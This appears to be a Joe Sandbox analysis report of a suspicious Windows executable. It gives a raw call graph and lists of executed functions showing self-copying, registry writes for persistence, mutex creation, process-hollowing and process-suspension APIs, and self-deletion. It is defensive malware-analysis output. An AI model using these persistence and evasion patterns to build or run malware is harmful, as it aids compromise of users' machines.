47465->47145 47467 41bc72 47466->47467 47775 40b904 47467->47775 47469 41bc7a 47469->47159 47471 401f22 47470->47471 47478 401f6a 47470->47478 47472 402252 11 API calls 47471->47472 47473 401f2b 47472->47473 47474 401f46 47473->47474 47475 401f6d 47473->47475 47807 40305c 28 API calls 47474->47807 47808 402336 47475->47808 47479 401f09 47478->47479 47480 402252 11 API calls 47479->47480 47481 401f12 47480->47481 47481->47171 47812 401f86 47482->47812 47485 40da70 47822 41b5b4 29 API calls 47485->47822 47486 40daa5 47488 41bfb7 2 API calls 47486->47488 47487 40da66 47490 40db99 GetLongPathNameW 47487->47490 47492 40daaa 47488->47492 47816 40417e 47490->47816 47495 40db00 47492->47495 47496 40daae 47492->47496 47493 40da79 47497 401f13 28 API calls 47493->47497 47499 40417e 28 API calls 47495->47499 47500 40417e 28 API calls 47496->47500 47534 40da83 47497->47534 47498 40417e 28 API calls 47501 40dbbd 47498->47501 47502 40db0e 47499->47502 47503 40dabc 47500->47503 47825 40ddd1 28 API calls 47501->47825 47508 40417e 28 API calls 47502->47508 47509 40417e 28 API calls 47503->47509 47505 401f09 11 API calls 47505->47487 47506 40dbd0 47826 402fa5 28 API calls 47506->47826 47511 40db24 47508->47511 47512 40dad2 47509->47512 47510 40dbdb 47827 402fa5 28 API calls 47510->47827 47824 402fa5 28 API calls 47511->47824 47823 402fa5 28 API calls 47512->47823 47516 40dbe5 47519 401f09 11 API calls 47516->47519 47517 40db2f 47520 401f13 28 API calls 47517->47520 47518 40dadd 47521 401f13 28 API calls 47518->47521 47522 40dbef 47519->47522 47523 40db3a 47520->47523 47524 40dae8 47521->47524 47525 401f09 11 API calls 47522->47525 47526 401f09 11 API calls 47523->47526 47527 401f09 11 API calls 47524->47527 47529 40dbf8 47525->47529 47530 40db43 47526->47530 47528 40daf1 47527->47528 47532 401f09 11 API calls 47528->47532 47533 401f09 11 API calls 47529->47533 47531 401f09 11 API calls 47530->47531 47531->47534 47532->47534 47535 40dc01 47533->47535 47534->47505 47536 401f09 11 API calls 47535->47536 47537 40dc0a 47536->47537 47538 401f09 11 API calls 47537->47538 47539 40dc13 47538->47539 47539->47208 47541 40ce0c _wcslen 47540->47541 47542 40ce60 47541->47542 47543 40ce16 47541->47543 47544 40da34 32 API calls 47542->47544 47546 40ce1f CreateDirectoryW 47543->47546 47545 40ce72 47544->47545 47547 401f13 28 API calls 47545->47547 47829 40915b 47546->47829 47549 40ce5e 47547->47549 47551 401f09 11 API calls 47549->47551 47550 40ce3b 47863 403014 47550->47863 47556 40ce89 47551->47556 47554 401f13 28 API calls 47555 40ce55 47554->47555 47557 401f09 11 API calls 47555->47557 47558 40cea2 47556->47558 47559 40cebf 47556->47559 47557->47549 47562 40cd0d 31 API calls 47558->47562 47560 40cec8 CopyFileW 47559->47560 47561 40cf99 47560->47561 47564 40ceda _wcslen 47560->47564 47836 40cd0d 47561->47836 47563 40ceb3 47562->47563 47563->47215 47564->47561 47566 40cef6 47564->47566 47567 40cf49 47564->47567 47570 40da34 32 API calls 47566->47570 47569 40da34 32 API calls 47567->47569 47573 40cf4f 47569->47573 47574 40cefc 47570->47574 47571 40cfdf 47572 40d027 CloseHandle 47571->47572 47576 40417e 28 API calls 47571->47576 47862 401f04 47572->47862 47577 401f13 28 API calls 47573->47577 47578 401f13 28 API calls 47574->47578 47575 40cfb3 47579 40cfbc SetFileAttributesW 47575->47579 47581 40cff5 47576->47581 47582 40cf43 47577->47582 47583 40cf08 47578->47583 47595 40cfcb _wcslen 47579->47595 47585 41bc5e 28 API calls 47581->47585 47591 401f09 11 API calls 47582->47591 47586 401f09 11 API calls 47583->47586 47584 40d043 ShellExecuteW 47587 40d060 ExitProcess 47584->47587 47588 40d056 47584->47588 47590 40d008 47585->47590 47592 40cf11 47586->47592 47589 40d069 CreateMutexA GetLastError 47588->47589 47589->47563 47869 413814 RegCreateKeyW 47590->47869 47593 40cf61 47591->47593 47594 40915b 28 API calls 47592->47594 47599 40cf6d CreateDirectoryW 47593->47599 47597 40cf25 47594->47597 47595->47571 47596 40cfdc SetFileAttributesW 47595->47596 47596->47571 47600 403014 28 API calls 47597->47600 47868 401f04 47599->47868 47601 40cf31 47600->47601 47605 401f13 28 API calls 47601->47605 47608 40cf3a 47605->47608 47606 401f09 11 API calls 47606->47572 47609 401f09 11 API calls 47608->47609 47609->47582 47610->47085 47611->47093 47612->47096 47614->47118 47616 40eba4 47615->47616 47617 413573 RegQueryValueExA RegCloseKey 47615->47617 47616->47115 47616->47133 47617->47616 47618->47121 47619->47151 47620->47145 47621->47135 47622->47149 47623->47219 47624->47239 47625->47201 47627 40209b 47626->47627 47628 4023ce 11 API calls 47627->47628 47629 4020a6 47628->47629 47922 4024ed 47629->47922 47632->47220 47633->47225 47634->47231 47635->47242 47636->47250 47637->47261 47642 4344ef 47638->47642 47639 43bd51 ___std_exception_copy 21 API calls 47639->47642 47640 40f0d1 47640->47268 47642->47639 47642->47640 47926 442f80 7 API calls 2 library calls 47642->47926 47927 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47642->47927 47928 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47642->47928 47645->47297 47646->47310 47647->47285 47648->47290 47650->47318 47651->47327 47652->47140 47654->47163 47655->47175 47929 41ad17 105 API calls 47656->47929 47658 41b4c5 LoadResource LockResource SizeofResource 47657->47658 47659 40f3de 47657->47659 47658->47659 47660 43bd51 47659->47660 47665 446137 __Getctype 47660->47665 47661 446175 47677 4405dd 20 API calls __dosmaperr 47661->47677 47663 446160 RtlAllocateHeap 47664 446173 47663->47664 47663->47665 47664->47362 47665->47661 47665->47663 47676 442f80 7 API calls 2 library calls 47665->47676 47668 4020bf 47667->47668 47678 4023ce 47668->47678 47670 4020ca 47682 40250a 47670->47682 47672 4020d9 47672->47365 47674 4020b7 28 API calls 47673->47674 47675 406dec 47674->47675 47675->47372 47676->47665 47677->47664 47679 402428 47678->47679 47680 4023d8 47678->47680 47679->47670 47680->47679 47689 4027a7 11 API calls std::_Deallocate 47680->47689 47683 40251a 47682->47683 47684 402520 47683->47684 47685 402535 47683->47685 47690 402569 47684->47690 47700 4028e8 47685->47700 47688 402533 47688->47672 47689->47679 47711 402888 47690->47711 47692 40257d 47693 402592 47692->47693 47694 4025a7 47692->47694 47716 402a34 22 API calls 47693->47716 47695 4028e8 28 API calls 47694->47695 47699 4025a5 47695->47699 47697 40259b 47717 4029da 22 API calls 47697->47717 47699->47688 47701 4028f1 47700->47701 47702 402953 47701->47702 47703 4028fb 47701->47703 47725 4028a4 22 API calls 47702->47725 47706 402904 47703->47706 47707 402917 47703->47707 47719 402cae 47706->47719 47708 402915 47707->47708 47710 4023ce 11 API calls 47707->47710 47708->47688 47710->47708 47712 402890 47711->47712 47713 402898 47712->47713 47718 402ca3 22 API calls 47712->47718 47713->47692 47716->47697 47717->47699 47720 402cb8 __EH_prolog 47719->47720 47726 402e54 22 API calls 47720->47726 47722 402d24 47723 4023ce 11 API calls 47722->47723 47724 402d92 47723->47724 47724->47708 47726->47722 47728 4020e7 47727->47728 47729 4023ce 11 API calls 47728->47729 47730 4020f2 47729->47730 47730->47400 47731->47400 47732->47400 47733->47390 47734->47381 47735->47404 47736->47408 47737->47410 47741 4032aa 47739->47741 47740 4032c9 47740->47420 47741->47740 47742 4028e8 28 API calls 47741->47742 47742->47740 47744 4051fb 47743->47744 47753 405274 47744->47753 47746 405208 47746->47423 47748 402061 47747->47748 47749 4023ce 11 API calls 47748->47749 47750 40207b 47749->47750 47758 40267a 47750->47758 47754 405282 47753->47754 47757 4028a4 22 API calls 47754->47757 47759 40268b 47758->47759 47760 4023ce 11 API calls 47759->47760 47761 40208d 47760->47761 47761->47426 47762->47428 47763->47439 47766 41bfc4 GetCurrentProcess IsWow64Process 47765->47766 47767 41b2d1 47765->47767 47766->47767 47768 41bfdb 47766->47768 47769 4135a6 RegOpenKeyExA 47767->47769 47768->47767 47770 4135d4 RegQueryValueExA RegCloseKey 47769->47770 47771 4135fe 47769->47771 47770->47771 47772 402093 28 API calls 47771->47772 47773 413613 47772->47773 47773->47450 47774->47458 47776 40b90c 47775->47776 47781 402252 47776->47781 47778 40b917 47785 40b92c 47778->47785 47780 40b926 47780->47469 47782 4022ac 47781->47782 47783 40225c 47781->47783 47782->47778 47783->47782 47792 402779 11 API calls std::_Deallocate 47783->47792 47786 40b966 47785->47786 47787 40b938 47785->47787 47804 4028a4 22 API calls 47786->47804 47793 4027e6 47787->47793 47791 40b942 47791->47780 47792->47782 47794 4027ef 47793->47794 47795 402851 47794->47795 47796 4027f9 47794->47796 47806 4028a4 22 API calls 47795->47806 47799 402802 47796->47799 47800 402815 47796->47800 47805 402aea 28 API calls __EH_prolog 47799->47805 47802 402813 47800->47802 47803 402252 11 API calls 47800->47803 47802->47791 47803->47802 47805->47802 47807->47478 47809 402347 47808->47809 47810 402252 11 API calls 47809->47810 47811 4023c7 47810->47811 47811->47478 47813 401f8e 47812->47813 47814 402252 11 API calls 47813->47814 47815 401f99 47814->47815 47815->47485 47815->47486 47815->47487 47817 404186 47816->47817 47818 402252 11 API calls 47817->47818 47819 404191 47818->47819 47828 4041bc 28 API calls 47819->47828 47821 40419c 47821->47498 47822->47493 47823->47518 47824->47517 47825->47506 47826->47510 47827->47516 47828->47821 47830 401f86 11 API calls 47829->47830 47831 409167 47830->47831 47875 40314c 47831->47875 47833 409184 47879 40325d 47833->47879 47835 40918c 47835->47550 47837 40cd33 47836->47837 47838 40cd6f 47836->47838 47893 40b97c 47837->47893 47839 40cdb0 47838->47839 47841 40b97c 28 API calls 47838->47841 47842 40cdf1 47839->47842 47844 40b97c 28 API calls 47839->47844 47846 40cd86 47841->47846 47842->47571 47842->47575 47847 40cdc7 47844->47847 47845 403014 28 API calls 47848 40cd4f 47845->47848 47849 403014 28 API calls 47846->47849 47850 403014 28 API calls 47847->47850 47851 413814 14 API calls 47848->47851 47852 40cd90 47849->47852 47853 40cdd1 47850->47853 47854 40cd63 47851->47854 47855 413814 14 API calls 47852->47855 47856 413814 14 API calls 47853->47856 47857 401f09 11 API calls 47854->47857 47858 40cda4 47855->47858 47859 40cde5 47856->47859 47857->47838 47860 401f09 11 API calls 47858->47860 47861 401f09 11 API calls 47859->47861 47860->47839 47861->47842 47900 403222 47863->47900 47865 403022 47904 403262 47865->47904 47870 413866 47869->47870 47871 413829 47869->47871 47872 401f09 11 API calls 47870->47872 47874 413842 RegSetValueExW RegCloseKey 47871->47874 47873 40d01b 47872->47873 47873->47606 47874->47870 47876 403156 47875->47876 47877 4027e6 28 API calls 47876->47877 47878 403175 47876->47878 47877->47878 47878->47833 47880 40323f 47879->47880 47883 4036a6 47880->47883 47882 40324c 47882->47835 47884 402888 22 API calls 47883->47884 47885 4036b9 47884->47885 47886 40372c 47885->47886 47887 4036de 47885->47887 47892 4028a4 22 API calls 47886->47892 47890 4027e6 28 API calls 47887->47890 47891 4036f0 47887->47891 47890->47891 47891->47882 47894 401f86 11 API calls 47893->47894 47895 40b988 47894->47895 47896 40314c 28 API calls 47895->47896 47897 40b9a4 47896->47897 47898 40325d 28 API calls 47897->47898 47899 40b9b7 47898->47899 47899->47845 47901 40322e 47900->47901 47910 403618 47901->47910 47903 40323b 47903->47865 47905 40326e 47904->47905 47906 402252 11 API calls 47905->47906 47907 403288 47906->47907 47908 402336 11 API calls 47907->47908 47909 403031 47908->47909 47909->47554 47911 403626 47910->47911 47912 403644 47911->47912 47913 40362c 47911->47913 47914 40365c 47912->47914 47915 40369e 47912->47915 47916 4036a6 28 API calls 47913->47916 47917 403642 47914->47917 47919 4027e6 28 API calls 47914->47919 47921 4028a4 22 API calls 47915->47921 47916->47917 47917->47903 47919->47917 47923 4024f9 47922->47923 47924 40250a 28 API calls 47923->47924 47925 4020b1 47924->47925 47925->47213 47926->47642 47937 4127ee 61 API calls 47933->47937 47938 44375d 47939 443766 47938->47939 47944 44377f 47938->47944 47940 44376e 47939->47940 47945 4437e5 47939->47945 47942 443776 47942->47940 47956 443ab2 22 API calls 2 library calls 47942->47956 47946 4437f1 47945->47946 47947 4437ee 47945->47947 47957 44f3dd GetEnvironmentStringsW 47946->47957 47947->47942 47952 443833 47952->47942 47953 443809 47965 446782 20 API calls __dosmaperr 47953->47965 47955 4437fe 47966 446782 20 API calls __dosmaperr 47955->47966 47956->47944 47958 44f3f1 47957->47958 47959 4437f8 47957->47959 47967 446137 47958->47967 47959->47955 47964 44390a 26 API calls 3 library calls 47959->47964 47961 44f405 ctype 47974 446782 20 API calls __dosmaperr 47961->47974 47963 44f41f FreeEnvironmentStringsW 47963->47959 47964->47953 47965->47955 47966->47952 47968 446175 47967->47968 47972 446145 __Getctype 47967->47972 47976 4405dd 20 API calls __dosmaperr 47968->47976 47970 446160 RtlAllocateHeap 47971 446173 47970->47971 47970->47972 47971->47961 47972->47968 47972->47970 47975 442f80 7 API calls 2 library calls 47972->47975 47974->47963 47975->47972 47976->47971 47977 43be58 47979 43be64 _swprintf ___DestructExceptionObject 47977->47979 47978 43be72 47993 4405dd 20 API calls __dosmaperr 47978->47993 47979->47978 47981 43be9c 47979->47981 47988 445888 EnterCriticalSection 47981->47988 47983 43be77 pre_c_initialization ___DestructExceptionObject 47984 43bea7 47989 43bf48 47984->47989 47988->47984 47990 43bf56 47989->47990 47992 43beb2 47990->47992 47995 44976c 36 API calls 2 library calls 47990->47995 47994 43becf LeaveCriticalSection std::_Lockit::~_Lockit 47992->47994 47993->47983 47994->47983 47995->47990 47996 40165e 47997 401666 47996->47997 47998 401669 47996->47998 47999 4016a8 47998->47999 48001 401696 47998->48001 48000 4344ea new 22 API calls 47999->48000 48003 40169c 48000->48003 48002 4344ea new 22 API calls 48001->48002 48002->48003

                                Executed Functions

                                Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E9C5 Relevance: 62.0, APIs: 14, Strings: 21, Instructions: 795COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 90 40ec13-40ec1a 79->90 91 40ec0c-40ec0e 79->91 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 90->93 94 40ec1e-40ec2a call 41b2c3 90->94 92 40eef1 91->92 92->49 93->94 103 40ec33-40ec37 94->103 104 40ec2c-40ec2e 94->104 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 108 40ec76-40ec89 call 401e65 call 401fab 103->108 109 40ec39 call 407716 103->109 104->103 129 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->129 130 40ec8b call 407755 108->130 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 129->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 129->178 130->129 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 202 40ed35-40ed61 call 401e65 call 401fab call 401e65 call 401fab call 40da34 178->202 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->233 182 40ed93-40ee05 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 272 40ee0a-40ee0d 182->272 192 40ee1e-40ee42 call 40247c call 434798 183->192 210 40ee51 192->210 211 40ee44-40ee4f call 436e90 192->211 248 40ed66-40ed7b call 401f13 call 401f09 202->248 216 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 210->216 211->216 216->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 216->288 286 40efc1 233->286 287 40efdc-40efde 233->287 248->177 272->192 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 305 40eeef 288->305 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 305->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->428 418->416 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
